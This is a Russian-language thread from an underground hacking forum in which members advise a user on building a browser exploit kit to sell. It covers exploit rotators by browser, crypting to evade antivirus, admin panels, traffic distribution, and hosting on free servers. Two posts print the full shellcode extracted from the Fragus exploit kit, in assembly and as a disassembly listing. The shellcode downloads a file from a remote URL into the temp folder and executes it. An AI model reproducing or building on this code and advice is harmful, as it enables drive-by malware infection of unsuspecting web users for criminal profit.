• XSS.stack #1 – первый литературный журнал от юзеров форума

Собираю связку

Отслеживать
Chococream

Chococream

Старожил форума
Легенда
Регистрация
31.10.2009
Сообщения
347
Реакции
42
Всем привет, давно уже пытаюсь собрать более-менее нормальную связку.
Прочитал много статей на эту тему, получил немного советов от своих знакомых.
Но всё же остались вопросы:
С какой связки можно начать делать свою или что вы посоветуете рабочее из паблика ?
Какие конкретно эксплоиты на данный момент актуальны ?
И последнее: подкиньте тем по сабжу, буду благодарен.
Все свои действия по сборке своего пака буду отписывать здесь, мало ли может кому и понадобится.
 
Надо учить javascript + php (можно чо угодно по большому счету, лиж бы браузерами воспринималось). Собсно все. Т.к. ты хочешь собирать, то я делаю вывод, что с кодингом ты мало знаком, а значит, что соберешь ты говнопак, который будет на 90% содержать в себе код из одноименной связки. Поэтому учи языки и пиши сам. Вот основные концепции:

1. Ротатор.
Если там опера, то ей выдаем пдф и яву; если ишак, то выдаем ему мдак, иепир, пдф, яву, снапшот и т.д.

2. Криптовка.
Не обязательный пункт, можно и без него с 25/31 превосходно себя чувствовать, но на рынок ты с такой фигней вряд ли выйдешь...
Тут отдельная тема и не такая уж и простая, потрахаться придется нормально.

3. Админка.
Тут уж на что фантазии хватит. Самое основное, что должно быть: стата по браузерам, реферерам, осям. Остальное - по желанию.

4. Сами сплойты.
Придется разобраться с шеллкодами, что это такое, как они пашут и каким образом взаимодействуются с эксплойтами. Ваще там не сложно, но скажу по себе: пока я допер до всего этого, пришлось пару ночей-таки поипаться... ДА и ваще в сплойтах полно всяких камней, так что вперед.

Мб все наверно. Если ты - кодер, то для тебя этой инфы будет достаточно. Кодер с мышлением, а не просто тупо с базовым синтаксиса, - это такой мен, который по ходу сам придумывает, как будет пахать та или иная тема. Это не так, что тебе щас выложат код готовый ротатора того же и ты вклеишь его и будешь чувствовать себя героем. В кодинге не должно быть шаблонности (за исключением отдельных случаев), это твой проект и он должен работать так, как ты это видишь, не надо таскать код со всех углов, это уже воровство в чистом виде называется. Пиши ротатор (возьмем его за пример) так, как видишь его ты. И срать на остальных.

P.S. Это все для кодера. Если ты не знаком с программированием, то бери любой пак и юзай его, хотя если захочешь что-то менять, то придется все равно кодить, так что проще свое замутить... Связку не надо собирать, её надо писать =)
 
Надо учить javascript + php (можно чо угодно по большому счету, лиж бы браузерами воспринималось). Собсно все. Т.к. ты хочешь собирать, то я делаю вывод, что с кодингом ты мало знаком, а значит, что соберешь ты говнопак, который будет на 90% содержать в себе код из одноименной связки. Поэтому учи языки и пиши сам.
ИМхо ты не прав. Если чел задает такие вопросы, то 80% что он уже знает основы пхп и js., да и не обязательно пхп, было бы идеально писать пак на си, а вообще может кому то удобнее и на перле или питоне....
а если нету знаний, то и соваться не стоит, есть более прибыльные темы с меньшими временными затратами)))

Да и для себя, можно кстати взять уже любую готовую паблик связку с нужным функционалом и хорошей админкой, добавить новых экспов и юзать, чем писать это всё с нуля.

я бы советовал взять фрагус, действительно некоторые моменты очень продуманы и удобны)
 
шеллкод писать и криптовать это тоже надо уметь , притом так написать его чтоб можно было криптануть без проблем ... база кернел32 , поиск фунок по хэшам , дельта смещение и все такое...

подведем итог: php+javascript+sql+asm+vir tricks+опыт и навыки

так что возьми какую-то связку где тебе более понятней и модифицируй ее - на данном этапе
 
Я никада в жизни не криптил шк и особых проблем не испытывал... Во всяком случае не помню, чтобы какие-либы кавы, присутствующие на моей тачке, палили что-либо тупо по шеллкоду...
 
ну если честно со связками вплотную не знаком , если не считать что приходилось писать шк для чужой связки, так вот некоторые челы говорили что и шк палится... хотя как по мне все таки наверно больше по скриптам должно палиться
 
Я тож периодически слышу про необходимость криптования шеллкодов на уровне самого шеллкода, а не скриптового его представления в сплойтах, но сам ни разу не сталкивался, хотя для интереса тестил его на каспере, битдефенде, авире... Должна срабатывать эвристика, но если сплойты чистые, то проблем не было...
 
а проблем то и не должно быть особых , ведь этот кусок кода выполняется в памяти доверенного приложения, это ж не екзешник запуск котрого перехватывается ав-продуктами... скорей всего палится последовательность байт при получении данных от js кода... то есть легкий косметический крипт по идее должен решать проблему
 
Очень приятно, спасибо за ваши ответы.
Знаком с несколькими языками, из них неплохо знаю пхп. Дело не в этом.

Суть, а точнее схема сбора связки мне понятна(на днях скачал себе штук 10 и разобрал), товарищ Exmanoize предложил мне разобрать фрагус - действительно интересный вариант, сейчас начал потихоньку разбирать.

Всё равно чувствую, что без должного знания javascript придётся тяжело.
Также хотел спросить про шк: наслыхан о Метасплоит Фрэймворк, обязательно ли его юзать или это просто особая среда для сборки эксплоитов ?
Впрочем есть познания по асму, если кто сможет поднатолкнуть на темы с сабжем о шк, буду очень благодарен.

п.с: пошёл шк курить, через неск. дней будет отпись, мб статья.
 
Шк тащи со связок. Старайся брать с актуальных т.к. на старых паках может паршиво работать на висте (или не работать вообще) и на некоторых xp. Яваскрипт нужен для написания криптов, без знаний его - просто ноль толку будет от твоих шеллкодов. Как вариант можно конечно криптовать руками, но это просто пиздец, особенно когда твой пак юзает не один чел, то:
1) заколебешься оооочень быстро.
2) результат такой криптовки тоже будет оставлять желать лучшего... да и с эвристиками наебешься ох как

Так что js учи.
P.S. До связки никогда не сталкивался с js и целенаправленно вообще не учил и почти не заглядывал в маны. Просто мучал сплойты, туда-сюда и как-то само выучилось... щас свободно пишу крипты и проблем не испытываю... Очень много схожего с пхп, так что за пару дней осовоишься если в манах посидеть... Я где-то за пару недель тупого штудирования сорсов криптов/сплойтов начал уже писать. Маны почти не курил, исключая отдельных случаев.
 
На днях фрагус разобрал, нашёл в ней Class ShellCode, увидел что он в основном везде юзается для получения файла в сплоите (кстати довольно интересный шк).
Отодрал ещё 2-3 шк из сплоитов, осталось их понять.
Сплоитов понакачал, сейчас делаю ротатор, посмотрим, что выйдет.
Спасибо всем за ответы!

После дизасма получил такой код(связка: Fragus):
Поскипано....

Может кто в шк мыслит, подскажет или накинет шк - за мной не заржавеет.
 
Не знаю как ты там дизасамблировал,но вот шелл код из Fragus v1.0,только что вынула.Все они в основном по стандарту:
Код: 
<ModuleEntryPoint>:
        xor eax,eax
        mov eax,dword ptr fs:[eax+030h];получает базу кернела
        js @tb3_00401014
        mov eax,dword ptr ds:[eax+0ch]
        mov esi,dword ptr ds:[eax+01ch]
        lods dword ptr ds:[esi]
        mov ebx,dword ptr ds:[eax+8]
        jmp @tb3_0040101D
@tb3_00401014:
        mov eax,dword ptr ds:[eax+034h]
        lea eax,dword ptr ds:[eax+07ch]
        mov ebx,dword ptr ds:[eax+03ch]
@tb3_0040101d:
        push 044h
        pop edx
        shl edx,1
        sub esp,edx
        mov ebp,esp
        jmp @tb3_00401077

@tb3_00401028:;кодес получения функций по их хешам                              
        pop edx
        push edx
        sub edx,056h
        mov dword ptr ss:[ebp+4],edx
        push esi
        push edi
        mov esi,dword ptr ds:[ebx+03ch]
        mov esi,dword ptr ds:[ebx+esi+078h]
        add esi,ebx
        push esi
        mov esi,dword ptr ds:[esi+020h]
        add esi,ebx
        xor ecx,ecx
        dec ecx
@tb3_00401044:
        push eax
        inc ecx
        lods dword ptr ds:[esi]
        xor edi,edi
@tb3_00401049:
        movsx edx,byte ptr ss:[ebx+eax]
        cmp dl,dh
        je @tb3_0040105A
        ror edi,0dh
        add edi,edx
        inc eax
        jmp @tb3_00401049
@tb3_0040105a:
        pop eax
        cmp edi,eax
        jnz @tb3_00401044
        pop esi
        mov eax,dword ptr ds:[esi+024h]
        add eax,ebx
        mov cx,word ptr ds:[eax+ecx*2]
        mov edx,dword ptr ds:[esi+01ch]
        add edx,ebx
        mov eax,dword ptr ds:[edx+ecx*4]
        add eax,ebx
        pop edi
        pop esi
        push eax
        ret                                  

@tb3_00401077:
        lea edi,dword ptr ss:[ebp+8]
        push edi
        push edx
        mov eax,05b8aca33h; получаем и вызываем функцию GetTempPathA 
        call @tb3_00401028
        xor al,al
        mov esi,edi
        repne scas byte ptr es:[edi]
        dec edi
        mov eax,078652e65h 
        stos dword ptr es:[edi]
        cbw
        stos word ptr es:[edi];добавляем к пути темповой папки имя файла
        mov al,06ch
        mov ah,al
        cwde
        push eax
        push 0642e6e6fh
        push 06d6c7275h
        push esp
        mov eax,0ec0e4e8eh
        call dword ptr ss:[ebp+4];получаем и вызываем функцию LoadLibraryA,"urlmon.dll"
        xchg eax,ebx
        push eax
        xor eax,eax
        push eax
        push eax
        push esi
        mov edx,dword ptr ss:[ebp+4]
        add edx,07fh
        add edx,031h
        push edx
        push eax
        mov eax,0702f1a36h
        call dword ptr ss:[ebp+4];далее функция URLDownloadToFileA
        pop ebx
        xor edi,edi
        push edi
        push esi
        mov eax,0e8afe98h
        call dword ptr ss:[ebp+4]; WinExec
        push edi
        mov eax,060e0ceefh
        call dword ptr ss:[ebp+4];ExitThread
 
Также хотел спросить про шк: наслыхан о Метасплоит Фрэймворк, обязательно ли его юзать или это просто особая среда для сборки эксплоитов ?
вообще им можно и шеллкодов и самих сплоитов нагенерить (в том числе и с простеньким шифрованием).
ну и потом привинтить свой ротатор со статой и можно продавать :crazy:
 
Вытурил таки листинг из ольки...
В принципе всё понятно, но есть нерешённые вопросы по поводу шк.
Пока, чтобы не загроможать тему отписал salamandra, затем в дальнейшем свои действия тут писать буду...

Код конечно не полный)
00000000 /FFFE ???
00000002 33C0 XOR EAX,EAX
00000004 64:8B40 30 MOV EAX,DWORD PTR FS:[EAX+30]
00000008 78 0C JS SHORT 00000016
0000000A 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
0000000D 8B70 1C MOV ESI,DWORD PTR DS:[EAX+1C]
00000010 AD LODS DWORD PTR DS:[ESI]
00000011 8B58 08 MOV EBX,DWORD PTR DS:[EAX+8]
00000014 EB 09 JMP SHORT 0000001F
00000016 8B40 34 MOV EAX,DWORD PTR DS:[EAX+34]
00000019 8D40 7C LEA EAX,DWORD PTR DS:[EAX+7C]
0000001C 8B58 3C MOV EBX,DWORD PTR DS:[EAX+3C]
0000001F 6A 44 PUSH 44
00000021 5A POP EDX
00000022 D1E2 SHL EDX,1
00000024 2BE2 SUB ESP,EDX
00000026 8BEC MOV EBP,ESP
00000028 EB 4F JMP SHORT 00000079
0000002A 5A POP EDX
0000002B 52 PUSH EDX
0000002C 83EA 56 SUB EDX,56
0000002F 8955 04 MOV DWORD PTR SS:[EBP+4],EDX
00000032 56 PUSH ESI
00000033 57 PUSH EDI
00000034 8B73 3C MOV ESI,DWORD PTR DS:[EBX+3C]
00000037 8B7433 78 MOV ESI,DWORD PTR DS:[EBX+ESI+78]
0000003B 03F3 ADD ESI,EBX
0000003D 56 PUSH ESI
0000003E 8B76 20 MOV ESI,DWORD PTR DS:[ESI+20]
00000041 03F3 ADD ESI,EBX
00000043 33C9 XOR ECX,ECX
00000045 49 DEC ECX
00000046 50 PUSH EAX
00000047 41 INC ECX
00000048 AD LODS DWORD PTR DS:[ESI]
00000049 33FF XOR EDI,EDI
0000004B 36:0FBE1403 MOVSX EDX,BYTE PTR SS:[EBX+EAX]
00000050 38F2 CMP DL,DH
00000052 74 08 JE SHORT 0000005C
00000054 C1CF 0D ROR EDI,0D
00000057 03FA ADD EDI,EDX
00000059 40 INC EAX
0000005A ^ EB EF JMP SHORT 0000004B
0000005C 58 POP EAX
0000005D 3BF8 CMP EDI,EAX
0000005F ^ 75 E5 JNZ SHORT 00000046
00000061 5E POP ESI
00000062 8B46 24 MOV EAX,DWORD PTR DS:[ESI+24]
00000065 03C3 ADD EAX,EBX
00000067 66:8B0C48 MOV CX,WORD PTR DS:[EAX+ECX*2]
0000006B 8B56 1C MOV EDX,DWORD PTR DS:[ESI+1C]
0000006E 03D3 ADD EDX,EBX
00000070 8B048A MOV EAX,DWORD PTR DS:[EDX+ECX*4]
00000073 03C3 ADD EAX,EBX
00000075 5F POP EDI
00000076 5E POP ESI
00000077 50 PUSH EAX
00000078 C3 RETN
00000079 8D7D 08 LEA EDI,DWORD PTR SS:[EBP+8]
0000007C 57 PUSH EDI
0000007D 52 PUSH EDX
0000007E B8 33CA8A5B MOV EAX,5B8ACA33
00000083 E8 A2FFFFFF CALL 0000002A ;GetTempPathA
00000088 32C0 XOR AL,AL
0000008A 8BF7 MOV ESI,EDI
0000008C F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0000008E 4F DEC EDI
0000008F B8 652E6578 MOV EAX,78652E65
00000094 AB STOS DWORD PTR ES:[EDI]
00000095 66:98 CBW
00000097 66:AB STOS WORD PTR ES:[EDI]
00000099 B0 6C MOV AL,6C
0000009B 8AE0 MOV AH,AL
0000009D 98 CWDE
0000009E 50 PUSH EAX
0000009F 68 6F6E2E64 PUSH 642E6E6F
000000A4 68 75726C6D PUSH 6D6C7275
000000A9 54 PUSH ESP
000000AA B8 8E4E0EEC MOV EAX,EC0E4E8E
000000AF FF55 04 CALL DWORD PTR SS:[EBP+4] ;LoadLibrary
000000B2 93 XCHG EAX,EBX
000000B3 50 PUSH EAX
000000B4 33C0 XOR EAX,EAX
000000B6 50 PUSH EAX
000000B7 50 PUSH EAX
000000B8 56 PUSH ESI
000000B9 8B55 04 MOV EDX,DWORD PTR SS:[EBP+4]
000000BC 83C2 7F ADD EDX,7F
000000BF 83C2 31 ADD EDX,31
000000C2 52 PUSH EDX
000000C3 50 PUSH EAX
000000C4 B8 361A2F70 MOV EAX,702F1A36
000000C9 FF55 04 CALL DWORD PTR SS:[EBP+4] ;URLDownloadToFileA
000000CC 5B POP EBX
 
Хотелось бы конкретней узнать от юзеров в какую сторону желательней мне сейчас копнуть: я так понимаю либо продумывать ротатор, либо решать дела с шк, либо начать с йаваскрипта.
Заранее спс.
 
Я бы посоветовал поучить основные моменты js но без особого углубления...Посмотри также в сторону крипта(как реализовано в паках, которые в паблике).Ну и пореверсь немного того, чего нет в паблике(и сделай на основе этого свои выводы)-за одно и допрешь каким браузерам какие сплойты надо выдавать,каким образом скрывать от ав пдфки, и многое другое..
 
если не знаешь яваскрипт то лучше начни с него...
далее подумай над выдачей
а уж потом прикручивай сплоиты и кним шелкодексы =\

помню мне гемаглабин показывал интересную идею.. а скане клсидов и нахождения софта на окмпе а потом уже подгрузкой аяксом нужные сплоиты.. оч неплохой способ
 
Спасибо ребят.
Взялся пока за йаваскрипт.
Криптование будет следующим.
Смотрю GOONER неплохие статьи по поиску и исл-ю сплоитов пишит - отдельный респект тебе, пиши ещё, мб и тебе помогу.
 
Я считаю, что тема написания паков на серверной базе в виде пхп - уже уходит. Самое интересное - заколбасить пак в виде статичного набора js и html файлов в котором ротатор будет собран на базе js. В связи с отсутствием необходимости серверной обработки, размещение связки возможно на фрихостингах. Для того чтобы избавиться от статичности содержимого и палева по сигнам пишется на удобном языке фтп обновлялка. Что касается статистики - об этом я уже писал статью. Траф можно перераспределять динамически по мере блокировки доменов\хостов. Данная тема актуальна для малобюджетного подхода в этом бизе, т.к. не требует антиобузных хостов\доменов и каких либо дополнительных вложений кроме покупки трафа.
 
Очень интересная мысль - взял себе на заметку, хоть и экзотика.
Плюсанул в репку за идею.
Правда весь траффик твой придётся проверять на "включённость" йаваскрипта, ибо если у юзера он отключён, то небольшая часть траффика теряется, хотя всё же нет - даже если йава нужен, можно заставить юзера его включить, а невключённые скорее всего генерик(боты).

Я так понял распределяем траффик, далле шлём его на наш js обработчик.
Собственно в кач-ве расп-ля может служить тдс.
Пока перескакивать на эту тему не буду, пока хотя бы морду не соберу.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх